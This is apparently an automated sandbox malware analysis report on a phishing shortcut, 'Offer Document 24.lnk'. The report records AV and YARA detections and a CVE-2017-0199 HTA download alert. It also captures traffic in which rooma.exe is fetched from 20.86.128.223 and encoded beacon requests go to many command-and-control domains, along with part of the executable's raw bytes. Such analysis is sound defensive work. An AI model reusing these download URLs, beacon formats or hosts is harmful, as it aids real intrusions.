          Source: C:\Users\user\AppData\Roaming\rooma.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].htaAvira: detection malicious, Label: VBS/Dldr.Agent.VPLT
          Source: C:\Users\user\AppData\Roaming\rooma.exeReversingLabs: Detection: 65%
          Source: Offer Document 24.lnkReversingLabs: Detection: 28%
          Source: Yara matchFile source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: C:\Users\user\AppData\Roaming\rooma.exeJoe Sandbox ML: detected
          Source: Offer Document 24.lnkJoe Sandbox ML: detected
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
          Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose,10_2_0256BAB0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax10_2_02559480
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi10_2_0255DD45
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 4x nop then pop edi14_2_023A7ACF
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 4x nop then pop edi14_2_023A79C8
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 4x nop then pop edi14_2_023B7693
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 4x nop then xor eax, eax14_2_023ABF3A

          Networking

          barindex
          Source: TrafficSnort IDS: 2024449 ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 192.168.2.8:49705 -> 20.86.128.223:80
          Source: DNS query: www.joyesi.xyz
          Source: unknownNetwork traffic detected: IP country count 12
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:20:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 23 May 2024 10:27:58 GMTETag: "42200-6191c8140a322"Accept-Ranges: bytesContent-Length: 270848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 c1 68 85 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 10 04 00 00 00 00 00 00 00 00 00 d0 15 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 0f 04 00 00 10 00 00 00 10 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewIP Address: 185.237.107.49 185.237.107.49
          Source: Joe Sandbox ViewIP Address: 116.50.37.244 116.50.37.244
          Source: Joe Sandbox ViewASN Name: UA-WEECOMI-ASUA UA-WEECOMI-ASUA
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: unknownTCP traffic detected without corresponding DNS query: 20.86.128.223
          Source: global trafficHTTP traffic detected: GET /room/room4.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 20.86.128.223Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficHTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.joyesi.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
          Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
          Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
          Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
          Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
          Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
          Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
          Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
          Source: global trafficDNS traffic detected: DNS query: www.techchains.info
          Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
          Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
          Source: global trafficDNS traffic detected: DNS query: www.660danm.top
          Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
          Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
          Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
          Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
          Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6d 44 41 36 52 35 2f 75 5a 49 5a 42 33 6f 64 4f 69 33 35 50 77 32 33 34 51 51 53 54 4c 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Plm0mn68=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffmDA6R5/uZIZB3odOi35Pw234QQSTL8LW+Fgf0g=
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 May 2024 18:20:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
